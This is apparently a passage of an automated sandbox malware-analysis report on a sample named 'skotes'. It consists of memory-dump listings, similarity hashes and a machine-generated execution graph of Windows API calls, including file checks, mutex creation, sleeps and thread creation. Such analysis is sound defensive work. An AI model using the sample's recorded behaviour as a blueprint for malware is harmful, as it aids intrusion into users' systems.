                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190632773.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190649011.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190665401.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190686546.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190703277.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190717961.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190732767.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190750881.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190767382.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190782460.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190801321.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190819556.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190836027.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190851456.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190866029.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190883869.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190949058.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190965422.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190983250.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190998963.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191013778.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191029584.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191050457.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191068741.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191085824.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                                                                                              • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                              • Instruction ID: 498cdc525dfdfb83c2c889e327597b750da7a13a5514c4ff37e8d4622be60cdf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AB136329046559FEB15CF28C8C17EEBBE5EF55340F24426AE865EB2C2D6348E42CB60
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2189953955.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189931163.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189953955.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190053283.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190083042.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190109598.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190134944.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190164290.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190332002.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190359366.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190390502.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190412116.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190474182.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190489139.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190504469.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190519203.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190539543.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190562376.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190577521.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190597488.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190617201.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190632773.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190649011.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190665401.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190686546.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190703277.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190717961.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190732767.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190750881.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190767382.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190782460.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190801321.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190819556.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190836027.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190851456.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190866029.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190883869.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190949058.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190965422.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190983250.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190998963.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191013778.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191029584.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191050457.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191068741.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191085824.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                                                                                                                              • Opcode ID: f8543847f07726ee3c49c09d30cecc01f351075ae0b7e82b83cf81ea777003c3
                                                                                                                                                                                                                                              • Instruction ID: 74f59ea1929a9731ec60f8544cf756a0ec4062a3451105935b79763ed191b336
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8543847f07726ee3c49c09d30cecc01f351075ae0b7e82b83cf81ea777003c3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA2121759001599FDF00EFA5DC81DBFBBB9EF08710F100455F901A7251DB349D069B90

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:6.8%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:7.2%
                                                                                                                                                                                                                                              Total number of Nodes:1145
                                                                                                                                                                                                                                              Total number of Limit Nodes:119
                                                                                                                                                                                                                                              execution_graph 36002 c0c1c4 36003 c0c367 36002->36003 36005 c0c1ee 36002->36005 36043 c075f6 36003->36043 36005->36003 36006 c0c239 36005->36006 36017 c1292b 36006->36017 36008 c0c259 36021 c12139 36008->36021 36010 c0c26d 36011 c0c352 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __wsopen_s 36010->36011 36028 c12165 36010->36028 36013 c0c27f 36013->36011 36035 c12191 36013->36035 36015 c0c291 36015->36011 36042 c12988 RtlAllocateHeap __FrameHandler3::FrameUnwindToState 36015->36042 36018 c12937 __FrameHandler3::FrameUnwindToState 36017->36018 36020 c1295c 36018->36020 36046 c1284d 36018->36046 36020->36008 36022 c12145 36021->36022 36023 c1215a 36021->36023 36024 c075f6 __dosmaperr RtlAllocateHeap 36022->36024 36023->36010 36025 c1214a 36024->36025 36159 c06c5a RtlAllocateHeap __wsopen_s 36025->36159 36027 c12155 36027->36010 36029 c12171 36028->36029 36030 c12186 36028->36030 36031 c075f6 __dosmaperr RtlAllocateHeap 36029->36031 36030->36013 36032 c12176 36031->36032 36160 c06c5a RtlAllocateHeap __wsopen_s 36032->36160 36034 c12181 36034->36013 36036 c121b2 36035->36036 36037 c1219d 36035->36037 36036->36015 36038 c075f6 __dosmaperr RtlAllocateHeap 36037->36038 36039 c121a2 36038->36039 36161 c06c5a RtlAllocateHeap __wsopen_s 36039->36161 36041 c121ad 36041->36015 36042->36011 36162 c0a7c8 RtlAllocateHeap _unexpected __freea 36043->36162 36045 c075fb 36045->36011 36047 c12899 36046->36047 36060 c128a0 36047->36060 36143 c0b04b RtlAllocateHeap RtlAllocateHeap __dosmaperr _unexpected Concurrency::details::FairScheduleGroup::AllocateSegment 36047->36143 36048 c12910 36051 c1290d 36048->36051 36114 c126f2 36048->36114 36050 c12907 36062 c12517 36050->36062 36055 c0adf5 __freea RtlAllocateHeap 36051->36055 36054 c128bf 36144 c0adf5 36054->36144 36056 c1291b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36055->36056 36056->36020 36058 c128b8 36058->36054 36059 c128e5 36058->36059 36061 c0adf5 __freea RtlAllocateHeap 36059->36061 36060->36048 36060->36050 36061->36060 36063 c12526 36062->36063 36064 c12191 RtlAllocateHeap 36063->36064 36065 c1253c 36064->36065 36066 c12139 RtlAllocateHeap 36065->36066 36067 c126c1 __wsopen_s 36065->36067 36071 c1254e 36066->36071 36069 c12191 RtlAllocateHeap 36067->36069 36113 c126c8 36067->36113 36068 c0adf5 __freea RtlAllocateHeap 36070 c1259e 36068->36070 36072 c12717 36069->36072 36148 c0b04b RtlAllocateHeap RtlAllocateHeap __dosmaperr _unexpected Concurrency::details::FairScheduleGroup::AllocateSegment 36070->36148 36071->36067 36071->36068 36071->36113 36074 c12139 RtlAllocateHeap 36072->36074 36081 c12842 __wsopen_s 36072->36081 36076 c12729 36074->36076 36075 c125b6 36077 c0adf5 __freea RtlAllocateHeap 36075->36077 36078 c12165 RtlAllocateHeap 36076->36078 36076->36081 36083 c125c2 36077->36083 36079 c1273b 36078->36079 36080 c12744 36079->36080 36079->36081 36082 c0adf5 __freea RtlAllocateHeap 36080->36082 36102 c128a0 36081->36102 36156 c0b04b RtlAllocateHeap RtlAllocateHeap __dosmaperr _unexpected Concurrency::details::FairScheduleGroup::AllocateSegment 36081->36156 36084 c1274f GetTimeZoneInformation 36082->36084 36083->36113 36149 c0a1f1 RtlAllocateHeap __dosmaperr __wsopen_s 36083->36149 36097 c1276b 36084->36097 36106 c127be __cftof 36084->36106 36085 c12910 36090 c1290d 36085->36090 36091 c126f2 5 API calls 36085->36091 36088 c12907 36092 c12517 5 API calls 36088->36092 36089 c125ec 36089->36067 36150 c14a64 RtlAllocateHeap __dosmaperr __wsopen_s 36089->36150 36094 c0adf5 __freea RtlAllocateHeap 36090->36094 36091->36090 36092->36090 36093 c128bf 36098 c0adf5 __freea RtlAllocateHeap 36093->36098 36096 c1291b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36094->36096 36096->36051 36155 c0ef17 GetPEB GetPEB RtlAllocateHeap _unexpected __fassign 36097->36155 36098->36102 36099 c128b8 36099->36093 36100 c128e5 36099->36100 36103 c0adf5 __freea RtlAllocateHeap 36100->36103 36102->36085 36102->36088 36103->36102 36104 c12605 36104->36067 36151 c08bbe GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 36104->36151 36106->36051 36107 c1262a 36108 c12680 36107->36108 36152 c08bbe GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 36107->36152 36108->36113 36154 c14a64 RtlAllocateHeap __dosmaperr __wsopen_s 36108->36154 36110 c12651 36110->36108 36153 c08bbe GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 36110->36153 36113->36051 36115 c12701 36114->36115 36116 c12191 RtlAllocateHeap 36115->36116 36117 c12717 36116->36117 36118 c12139 RtlAllocateHeap 36117->36118 36123 c12842 __wsopen_s 36117->36123 36119 c12729 36118->36119 36120 c12165 RtlAllocateHeap 36119->36120 36119->36123 36121 c1273b 36120->36121 36122 c12744 36121->36122 36121->36123 36124 c0adf5 __freea RtlAllocateHeap 36122->36124 36140 c128a0 36123->36140 36158 c0b04b RtlAllocateHeap RtlAllocateHeap __dosmaperr _unexpected Concurrency::details::FairScheduleGroup::AllocateSegment 36123->36158 36125 c1274f GetTimeZoneInformation 36124->36125 36135 c1276b 36125->36135 36142 c127be __cftof 36125->36142 36126 c12910 36129 c1290d 36126->36129 36130 c126f2 5 API calls 36126->36130 36128 c12907 36131 c12517 5 API calls 36128->36131 36133 c0adf5 __freea RtlAllocateHeap 36129->36133 36130->36129 36131->36129 36132 c128bf 36136 c0adf5 __freea RtlAllocateHeap 36132->36136 36134 c1291b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36133->36134 36134->36051 36157 c0ef17 GetPEB GetPEB RtlAllocateHeap _unexpected __fassign 36135->36157 36136->36140 36137 c128b8 36137->36132 36138 c128e5 36137->36138 36141 c0adf5 __freea RtlAllocateHeap 36138->36141 36140->36126 36140->36128 36141->36140 36142->36051 36143->36058 36145 c0ae00 36144->36145 36147 c0ae1b __dosmaperr 36144->36147 36146 c075f6 __dosmaperr RtlAllocateHeap 36145->36146 36145->36147 36146->36147 36147->36060 36148->36075 36149->36089 36150->36104 36151->36107 36152->36110 36153->36108 36154->36067 36155->36106 36156->36099 36157->36142 36158->36137 36159->36027 36160->36034 36161->36041 36162->36045 36163 bda079 GetFileAttributesA 36167 bda089 Concurrency::details::ContextBase::GetArbitraryAlias 36163->36167 36164 bda930 36176 c06c6a 36164->36176 36165 bda154 Concurrency::details::ContextBase::GetArbitraryAlias 36179 be80c0 36165->36179 36167->36164 36167->36165 36168 bda953 Sleep CreateMutexA 36173 bda98e 36168->36173 36171 bda903 36172 bda9a7 36173->36172 36174 c06629 GetPEB GetPEB RtlAllocateHeap 36173->36174 36175 bda9b0 36174->36175 36194 c06bf6 RtlAllocateHeap __dosmaperr __wsopen_s 36176->36194 36178 c06c79 __wsopen_s 36182 be80de __InternalCxxFrameHandler 36179->36182 36184 be8104 36179->36184 36180 be81ee 36203 be9270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 36180->36203 36182->36171 36183 be81f3 36204 bd2480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 36183->36204 36184->36180 36186 be817d 36184->36186 36187 be8158 36184->36187 36190 bed3e2 Concurrency::details::FairScheduleGroup::AllocateSegment 2 API calls 36186->36190 36191 be8169 std::_Rethrow_future_exception 36186->36191 36187->36183 36195 bed3e2 36187->36195 36188 be81f8 36190->36191 36192 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36191->36192 36193 be81d0 Concurrency::details::ContextBase::GetArbitraryAlias 36191->36193 36192->36180 36193->36171 36194->36178 36198 bed3e7 Concurrency::details::FairScheduleGroup::AllocateSegment 36195->36198 36197 bed401 36197->36191 36198->36197 36199 bd2480 Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 36198->36199 36205 c08be1 36198->36205 36200 bed40d Concurrency::details::ResourceManager::ResourceManager Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 36199->36200 36211 c038af RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 36199->36211 36202 bd24c3 36202->36191 36204->36188 36207 c0b04b _unexpected Concurrency::details::FairScheduleGroup::AllocateSegment 36205->36207 36206 c0b089 36209 c075f6 __dosmaperr RtlAllocateHeap 36206->36209 36207->36206 36208 c0b074 RtlAllocateHeap 36207->36208 36208->36207 36210 c0b087 36208->36210 36209->36210 36210->36198 36211->36202 36212 bda418 GetFileAttributesA 36216 bda428 Concurrency::details::ContextBase::GetArbitraryAlias 36212->36216 36213 bda93f 36215 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36213->36215 36214 bda4f3 Concurrency::details::ContextBase::GetArbitraryAlias 36218 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36214->36218 36217 bda944 36215->36217 36216->36213 36216->36214 36219 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36217->36219 36220 bda903 36218->36220 36221 bda949 36219->36221 36222 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36221->36222 36223 bda94e 36222->36223 36224 bda953 Sleep CreateMutexA 36223->36224 36225 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36223->36225 36228 bda98e 36224->36228 36225->36224 36227 bda9a7 36228->36227 36231 c06629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 36228->36231 36230 bda9b0 36231->36230 36260 bda54d GetFileAttributesA 36261 bda55d Concurrency::details::ContextBase::GetArbitraryAlias 36260->36261 36262 bda944 36261->36262 36264 bda628 Concurrency::details::ContextBase::GetArbitraryAlias 36261->36264 36263 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36262->36263 36265 bda949 36263->36265 36266 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36264->36266 36267 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36265->36267 36268 bda903 36266->36268 36269 bda94e 36267->36269 36270 bda953 Sleep CreateMutexA 36269->36270 36271 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36269->36271 36274 bda98e 36270->36274 36271->36270 36273 bda9a7 36274->36273 36277 c06629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 36274->36277 36276 bda9b0 36277->36276 36292 be0cad 36293 be0f13 Concurrency::details::ContextBase::GetArbitraryAlias 36292->36293 36332 be7a00 36293->36332 36295 be0f34 36296 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36295->36296 36297 be0f46 36296->36297 36346 bdc360 36297->36346 36299 be0f4f 36351 c06729 36299->36351 36303 be0f7f 36304 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36303->36304 36305 be0f94 Concurrency::details::ContextBase::GetArbitraryAlias 36304->36305 36306 c075f6 __dosmaperr RtlAllocateHeap 36305->36306 36331 be1168 36305->36331 36307 be101e 36306->36307 36363 c08ab6 36307->36363 36310 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36311 be109d 36310->36311 36312 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36311->36312 36313 be10b8 36312->36313 36314 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36313->36314 36315 be10cd 36314->36315 36367 bd7590 Sleep 36315->36367 36317 be10d6 36318 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36317->36318 36319 be1100 36318->36319 36385 bd5c10 36319->36385 36321 be1107 36322 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36321->36322 36323 be111d 36322->36323 36324 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36323->36324 36325 be1135 36324->36325 36326 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36325->36326 36327 be114d 36326->36327 36328 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36327->36328 36329 be115f 36328->36329 36397 bde530 36329->36397 36333 be7a26 36332->36333 36334 be7a2d 36333->36334 36335 be7a62 36333->36335 36336 be7a81 36333->36336 36334->36295 36337 be7ab9 36335->36337 36338 be7a69 36335->36338 36340 bed3e2 Concurrency::details::FairScheduleGroup::AllocateSegment 2 API calls 36336->36340 36344 be7a76 std::_Rethrow_future_exception 36336->36344 36551 bd2480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 36337->36551 36339 bed3e2 Concurrency::details::FairScheduleGroup::AllocateSegment 2 API calls 36338->36339 36342 be7a6f 36339->36342 36340->36344 36343 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36342->36343 36342->36344 36345 be7ac3 Concurrency::details::ContextBase::GetArbitraryAlias __Cnd_destroy_in_situ __Mtx_destroy_in_situ Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection 36343->36345 36344->36295 36345->36295 36347 bdc839 36346->36347 36348 bdc8a1 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36347->36348 36349 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36347->36349 36348->36299 36350 bdc8db 36349->36350 36552 c06672 36351->36552 36353 be0f6e 36354 c067b7 36353->36354 36355 c067c3 __FrameHandler3::FrameUnwindToState 36354->36355 36356 c067cd 36355->36356 36360 c067e2 ___scrt_uninitialize_crt 36355->36360 36357 c075f6 __dosmaperr RtlAllocateHeap 36356->36357 36358 c067d2 36357->36358 36581 c06c5a RtlAllocateHeap __wsopen_s 36358->36581 36362 c067dd 36360->36362 36582 c06740 3 API calls 4 library calls 36360->36582 36362->36303 36364 c08ad1 36363->36364 36583 c08868 36364->36583 36368 bd765e 36367->36368 36369 bd75e3 36367->36369 36370 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36368->36370 36624 bed111 SleepConditionVariableCS 36369->36624 36372 bd767a 36370->36372 36374 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36372->36374 36373 bd75ed 36373->36368 36625 bed64e RtlAllocateHeap RtlAllocateHeap 36373->36625 36375 bd7693 36374->36375 36377 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36375->36377 36379 bd76ac CreateThread Sleep 36377->36379 36378 bd7654 36626 bed0c7 RtlWakeAllConditionVariable 36378->36626 36381 bd76d9 Concurrency::details::ContextBase::GetArbitraryAlias 36379->36381 36627 bd7430 36379->36627 36382 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36381->36382 36383 bd777f Concurrency::details::ContextBase::GetArbitraryAlias 36381->36383 36384 bd77a0 36382->36384 36383->36317 36640 bd5940 36385->36640 36389 bd5c6a 36664 bd4b30 36389->36664 36391 bd5c7b Concurrency::details::ContextBase::GetArbitraryAlias 36393 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36391->36393 36394 bd5ce7 Concurrency::details::ContextBase::GetArbitraryAlias 36391->36394 36392 bd5d17 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36392->36321 36393->36394 36394->36392 36395 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36394->36395 36396 bd5d47 36395->36396 36398 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36397->36398 36399 bde576 36398->36399 36400 bd5c10 5 API calls 36399->36400 36401 bde581 36400->36401 36402 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36401->36402 36403 bde59c 36402->36403 36404 bd5c10 5 API calls 36403->36404 36405 bde5a7 36404->36405 36678 be9280 36405->36678 36407 bde5ba 36683 be8320 36407->36683 36409 bde5fc 36687 be8220 36409->36687 36411 bde60d 36412 be8320 2 API calls 36411->36412 36413 bde61e 36412->36413 36414 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36413->36414 36415 bde7cb 36414->36415 36416 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36415->36416 36417 bde7e0 36416->36417 36418 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36417->36418 36419 bde7f2 36418->36419 36695 